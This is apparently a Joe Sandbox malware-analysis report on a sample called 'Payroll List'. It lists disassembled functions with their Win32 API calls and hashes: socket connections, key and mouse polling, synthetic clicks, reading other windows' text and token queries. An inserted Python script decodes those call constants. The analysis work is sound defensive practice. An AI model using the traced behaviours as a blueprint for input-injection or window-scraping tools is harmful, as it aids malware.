                                                                    • Instruction Fuzzy Hash: 2E514871208204AFD705EF64D891E6EB7F9BF98304F04885DF696972A1DB30EA14CF92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7eb7f93227dd79ba69559f32bb7fe0c8961869a494048eb8fc444daecfb52a6
                                                                    • Instruction ID: 03de2e2d33104cf89c5faac509440c95fb1e8b99249b57bbbb9e477f51b26343
                                                                    • Opcode Fuzzy Hash: e7eb7f93227dd79ba69559f32bb7fe0c8961869a494048eb8fc444daecfb52a6
                                                                    • Instruction Fuzzy Hash: 8441B079900604ABC724FBA8CC48FA9BF69EB09310F150265F95AA76D1C770AE41DFE0
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001712B4
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001712DD
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0017131C
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00171341
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00171349
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: 4ee1010704d00c67a5da62fcedc51c7e88917195c6bb7609cbbefa8b7716fcad
                                                                    • Instruction ID: c12d1c7dfadbdd0486cde2743aa536635c82be239a58ccd744fa1d2de288c939
                                                                    • Opcode Fuzzy Hash: 4ee1010704d00c67a5da62fcedc51c7e88917195c6bb7609cbbefa8b7716fcad
                                                                    • Instruction Fuzzy Hash: D6411C35A00515DFCF01EF64D981AADBBF5FF19310B148099E90AAB362CB31ED51DB90
                                                                    APIs
                                                                    • GetCursorPos.USER32(000000FF), ref: 0013B64F
                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0013B66C
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 0013B691
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0013B69F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 907cf7d73f3c8ae9635ed0b8c356ab5d64513b480258f026e1fea5764f38fbbf
                                                                    • Instruction ID: e649d9d86420e23f6ee69d59705c7449f87e0e7a251dabaeb681bfeaad1a73cf
                                                                    • Opcode Fuzzy Hash: 907cf7d73f3c8ae9635ed0b8c356ab5d64513b480258f026e1fea5764f38fbbf
                                                                    • Instruction Fuzzy Hash: 81417E75A08119FBCF199F64C885AEDBBB4FB05324F104319F82A96291DB30AD94DFA1
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 0015B369
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0015B413
                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0015B41B
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0015B429
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0015B431
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 13dd13b811e8ecf55b21fd97cda71c22079f94ce671ee7081f4ac49f90fb39e3
                                                                    • Instruction ID: def66cdb9c90b0b8a4f245a8095fa8f8d4d26d08589defa5b1e327eaf1c399ae
                                                                    • Opcode Fuzzy Hash: 13dd13b811e8ecf55b21fd97cda71c22079f94ce671ee7081f4ac49f90fb39e3
                                                                    • Instruction Fuzzy Hash: AE31CE71904219EBDF14CF68D98DADE3BB5FB05316F114229F836AA1D1C3B09958CB90
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0015DBD7
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0015DBF4
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0015DC2C
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0015DC52
                                                                    • _wcsstr.LIBCMT ref: 0015DC5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 3902887630-0
                                                                    • Opcode ID: a54003ac2e464b9cab31a785302ce8bc42cf7940bd390283cdc05f76f5ffb051
                                                                    • Instruction ID: 16c400fe329020b5a62f3a098a43148c1ea4e0f41e122fd2dea22bc9750f28b9
                                                                    • Opcode Fuzzy Hash: a54003ac2e464b9cab31a785302ce8bc42cf7940bd390283cdc05f76f5ffb051
                                                                    • Instruction Fuzzy Hash: A521F272204200FBEB259F29AC49E7B7BA8DF46761F11402DFC0ECE191EBA1C84593A0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0015BC90
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015BCC2
                                                                    • __itow.LIBCMT ref: 0015BCDA
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015BD00
                                                                    • __itow.LIBCMT ref: 0015BD11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 5abebf8cd7fa2cf1bbee98c7afea26a5aba03f250851c1897281c6e1ebf01cf2
                                                                    • Instruction ID: bec04c1d1e9f0c61e84382a0d8ca40bb078bf7d0359a40ed73c099f2310edf96
                                                                    • Opcode Fuzzy Hash: 5abebf8cd7fa2cf1bbee98c7afea26a5aba03f250851c1897281c6e1ebf01cf2
                                                                    • Instruction Fuzzy Hash: A621C635600618FEDB10ABA59CC6FDE7A79AF5A711F000025FD26EF181EBB08D4987A1
                                                                    APIs
                                                                      • Part of subcall function 001250E6: _wcsncpy.LIBCMT ref: 001250FA
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,001660C3), ref: 00166369
                                                                    • GetLastError.KERNEL32(?,?,?,001660C3), ref: 00166374
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001660C3), ref: 00166388
                                                                    • _wcsrchr.LIBCMT ref: 001663AA
                                                                      • Part of subcall function 00166318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001660C3), ref: 001663E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                    • String ID:
                                                                    • API String ID: 3633006590-0
                                                                    • Opcode ID: e77200bba0bff1b03071649ef720a199d9b2a4d5374cb8513bcc510de420c56f
                                                                    • Instruction ID: a687072ba8ba2f3c326b61cb6fd2614646ee360702d92c1e4e89d85e06630bc1
                                                                    • Opcode Fuzzy Hash: e77200bba0bff1b03071649ef720a199d9b2a4d5374cb8513bcc510de420c56f
                                                                    • Instruction Fuzzy Hash: 612105319042159BDB15AB78AC46FEA33ACFF26360F10006AF04ED72D0EB60DD958A55
                                                                    APIs
                                                                      • Part of subcall function 0017A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0017A84E
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00178BD3
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178BE2
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00178BFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 3701255441-0
                                                                    • Opcode ID: 43d6f1d1e91db70a3750bb5e9b4fa215a08b98611b184233fba75925ed7d9193
                                                                    • Instruction ID: 1f3043cb290306bd66510e1f3754a7cf27cddd98c5869b8f6508f0534b5d0341
                                                                    • Opcode Fuzzy Hash: 43d6f1d1e91db70a3750bb5e9b4fa215a08b98611b184233fba75925ed7d9193
                                                                    • Instruction Fuzzy Hash: 6E21CD312006149FCB14AF68DC89B7E77A9AF59724F048449F94AAB2D2CF74AC418B61
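The API lines in these records print every argument as a raw hexadecimal stack value, so the reader has to decode them by hand: 0x201/0x202 passed to PostMessageW are WM_LBUTTONDOWN/WM_LBUTTONUP (a synthetic left click posted to a window found with GetWindowRect), 0x0E/0x0D passed to SendMessageW are WM_GETTEXTLENGTH/WM_GETTEXT (reading another window's text before the CharUpperBuffW/_wcsstr match), 0x1004/0x102C are LVM_GETITEMCOUNT/LVM_GETITEMSTATE (walking a list-view's selected items), GetAsyncKeyState(1)/(2) poll VK_LBUTTON/VK_RBUTTON, and socket(2,1,6) is AF_INET/SOCK_STREAM/IPPROTO_TCP. The Python script below is an added example and not part of the Joe Sandbox report or its tooling: it parses lines in the report's "API.MODULE(args), ref: ADDR" format, names the constants seen in these records, and flags a few call idioms. The constant tables are a hand-picked subset of Windows SDK values and the idiom list is a heuristic chosen for this example; the sample input is constructed from lines copied out of the records above.

```python
"""Decode the raw Win32 constants in Joe Sandbox "APIs" lines.

Added example, not part of the Joe Sandbox report. SAMPLE_LINES are copied
from the function records of this report; the constant tables are a small
hand-picked subset of Windows SDK values and IDIOMS is a heuristic chosen
for this example. Neither comes from Joe Sandbox.
"""
import re
from typing import Dict, FrozenSet, List, Optional, Tuple

# Matches e.g. "PostMessageW.USER32(?,00000201,00000001), ref: 0015B413".
# Lines without an argument list ("GetForegroundWindow.USER32 ref: ...") are skipped.
CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\), ref: ([0-9A-Fa-f]+)")

# Window and list-view messages that appear in these records (Windows SDK values).
WM_MESSAGES: Dict[int, str] = {
    0x000D: "WM_GETTEXT",
    0x000E: "WM_GETTEXTLENGTH",
    0x0201: "WM_LBUTTONDOWN",
    0x0202: "WM_LBUTTONUP",
    0x1004: "LVM_GETITEMCOUNT",
    0x102C: "LVM_GETITEMSTATE",
}
VK_CODES: Dict[int, str] = {0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON"}
SOCKET_AF: Dict[int, str] = {2: "AF_INET"}
SOCKET_TYPE: Dict[int, str] = {1: "SOCK_STREAM"}
SOCKET_PROTO: Dict[int, str] = {6: "IPPROTO_TCP"}

# (API name, 0-based argument index) -> table that decodes that argument.
# Keying on API and position matters: the report lists extra stack slots
# beyond an API's real parameters (Sleep shows seven values), and those
# leftovers must not be labelled as if they were message IDs.
ARG_TABLES: Dict[Tuple[str, int], Dict[int, str]] = {
    ("SendMessageW", 1): WM_MESSAGES,
    ("PostMessageW", 1): WM_MESSAGES,
    ("GetAsyncKeyState", 0): VK_CODES,
    ("socket", 0): SOCKET_AF,
    ("socket", 1): SOCKET_TYPE,
    ("socket", 2): SOCKET_PROTO,
}

# Call idioms worth a second look. Heuristic, chosen for this example.
IDIOMS: List[Tuple[FrozenSet[str], str]] = [
    (frozenset({"WM_LBUTTONDOWN", "WM_LBUTTONUP"}), "posts a synthetic left click into a target window"),
    (frozenset({"WM_GETTEXTLENGTH", "WM_GETTEXT"}), "reads the text of another window or control"),
    (frozenset({"VK_LBUTTON"}), "polls mouse button state via GetAsyncKeyState"),
    (frozenset({"AF_INET", "SOCK_STREAM"}), "creates an IPv4 TCP socket"),
]

# Constructed sample input: lines copied from the function records above.
SAMPLE_LINES: List[str] = [
    "• GetWindowRect.USER32(?,?), ref: 0015B369",
    "• PostMessageW.USER32(?,00000201,00000001), ref: 0015B413",
    "• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0015B41B",
    "• PostMessageW.USER32(?,00000202,00000000), ref: 0015B429",
    "• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0015DBF4",
    "• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0015DC2C",
    "• GetAsyncKeyState.USER32(00000001), ref: 0013B691",
    "• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00178BD3",
]


def parse_call(line: str) -> Optional[Tuple[str, str, List[str], str]]:
    """Return (api, module, args, ref) for a report line, or None if it has no call."""
    m = CALL_RE.search(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    arg_list = [a.strip() for a in args.split(",")] if args.strip() else []
    return api, module, arg_list, ref


def decode_arg(api: str, index: int, raw: str) -> Optional[str]:
    """Name the constant in argument `index` of `api` if its value is known.

    Joe Sandbox prints arguments in hexadecimal; "?" means the value was not
    recovered and is left undecoded.
    """
    table = ARG_TABLES.get((api, index))
    if table is None or raw == "?":
        return None
    try:
        value = int(raw, 16)
    except ValueError:
        return None
    return table.get(value)


def annotate(lines: List[str]) -> List[str]:
    """Render each call with its decoded constants, e.g.
    '0015B413 PostMessageW(?, 00000201=WM_LBUTTONDOWN, 00000001)'."""
    out: List[str] = []
    for line in lines:
        parsed = parse_call(line)
        if parsed is None:
            continue
        api, _module, args, ref = parsed
        shown = []
        for i, raw in enumerate(args):
            name = decode_arg(api, i, raw)
            shown.append(f"{raw}={name}" if name else raw)
        out.append(f"{ref} {api}({', '.join(shown)})")
    return out


def summarize(lines: List[str]) -> List[str]:
    """List the IDIOMS whose constants all appear somewhere in `lines`."""
    seen = set()
    for line in lines:
        parsed = parse_call(line)
        if parsed is None:
            continue
        api, _module, args, _ref = parsed
        for i, raw in enumerate(args):
            name = decode_arg(api, i, raw)
            if name:
                seen.add(name)
    return [desc for needed, desc in IDIOMS if needed <= seen]


if __name__ == "__main__":
    for entry in annotate(SAMPLE_LINES):
        print(entry)
    for finding in summarize(SAMPLE_LINES):
        print("->", finding)
```

Run it against any block of "APIs" lines pasted from the report; calls whose arguments are not in ARG_TABLES are echoed unchanged, so extending the tables with further SDK constants (other WM_*, RegOpenKeyExW access masks, GetPrivateProfile* arguments) is the only change needed to cover more records.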
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00178441
                                                                    • GetForegroundWindow.USER32 ref: 00178458
                                                                    • GetDC.USER32(00000000), ref: 00178494
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 001784A0
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 001784DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: 47ec9cbe35af5bb95c14c703a00022cc2b88774b6049a5e8581ff17e1db234fc
                                                                    • Instruction ID: 0a75dc68643513481d3f753efb9a71af0b6f8b937f87a2cae6fb269bd203fa57
                                                                    • Opcode Fuzzy Hash: 47ec9cbe35af5bb95c14c703a00022cc2b88774b6049a5e8581ff17e1db234fc
                                                                    • Instruction Fuzzy Hash: 94215E75A00204AFD704EFA4D889AAEBBF5EF49301F148479F85A97A51DB70AC40CB60
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013AFE3
                                                                    • SelectObject.GDI32(?,00000000), ref: 0013AFF2
                                                                    • BeginPath.GDI32(?), ref: 0013B009
                                                                    • SelectObject.GDI32(?,00000000), ref: 0013B033
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: 3899f449229c9ec7815d290c6b972beff619f22db797c941f01504b989a1dc4d
                                                                    • Instruction ID: 467005b3d6f7e2f2d7643de108703d919b756089b466678c1bfc9ef4665cd2a0
                                                                    • Opcode Fuzzy Hash: 3899f449229c9ec7815d290c6b972beff619f22db797c941f01504b989a1dc4d
                                                                    • Instruction Fuzzy Hash: 9021BDB0900284FFDB14DF94ECC87AE3B78BB18361F54431AF5259A8A0D3B049C18F90
                                                                    APIs
                                                                    • __calloc_crt.LIBCMT ref: 001421A9
                                                                    • CreateThread.KERNEL32(?,?,001422DF,00000000,?,?), ref: 001421ED
                                                                    • GetLastError.KERNEL32 ref: 001421F7
                                                                    • _free.LIBCMT ref: 00142200
                                                                    • __dosmaperr.LIBCMT ref: 0014220B
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                    • String ID:
                                                                    • API String ID: 2664167353-0
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015ABD7
                                                                    • GetLastError.KERNEL32(?,0015A69F,?,?,?), ref: 0015ABE1
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0015A69F,?,?,?), ref: 0015ABF0
                                                                    • HeapAlloc.KERNEL32(00000000,?,0015A69F,?,?,?), ref: 0015ABF7
                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015AC0E
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167A74
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00167A82
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00167A8A
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00167A94
                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32 ref: 00159ADC
                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00159AF7
                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00159B05
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00159B15
                                                                    • CLSIDFromString.OLE32(?,?), ref: 00159B21
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0015AA79
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0015AA83
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0015AA92
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0015AA99
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0015AAAF
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0015AADA
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0015AAE4
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015AAF3
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0015AAFA
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015AB10
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0015EC94
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0015ECAB
                                                                    • MessageBeep.USER32(00000000), ref: 0015ECC3
                                                                    • KillTimer.USER32(?,0000040A), ref: 0015ECDF
                                                                    • EndDialog.USER32(?,00000001), ref: 0015ECF9
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 0013B0BA
                                                                    • StrokeAndFillPath.GDI32(?,?,0019E680,00000000,?,?,?), ref: 0013B0D6
                                                                    • SelectObject.GDI32(?,00000000), ref: 0013B0E9
                                                                    • DeleteObject.GDI32 ref: 0013B0FC
                                                                    • StrokePath.GDI32(?), ref: 0013B117
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0016F2DA
                                                                    • CoCreateInstance.OLE32(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016F2F2
                                                                    • CoUninitialize.OLE32 ref: 0016F555
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                    • String ID: .lnk
                                                                    • API String ID: 948891078-24824748
                                                                    APIs
                                                                      • Part of subcall function 0012660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001253B1,?,?,001261FF,?,00000000,00000001,00000000), ref: 0012662F
                                                                    • CoInitialize.OLE32(00000000), ref: 0016E85D
                                                                    • CoCreateInstance.OLE32(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016E876
                                                                    • CoUninitialize.OLE32 ref: 0016E893
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    Similarity
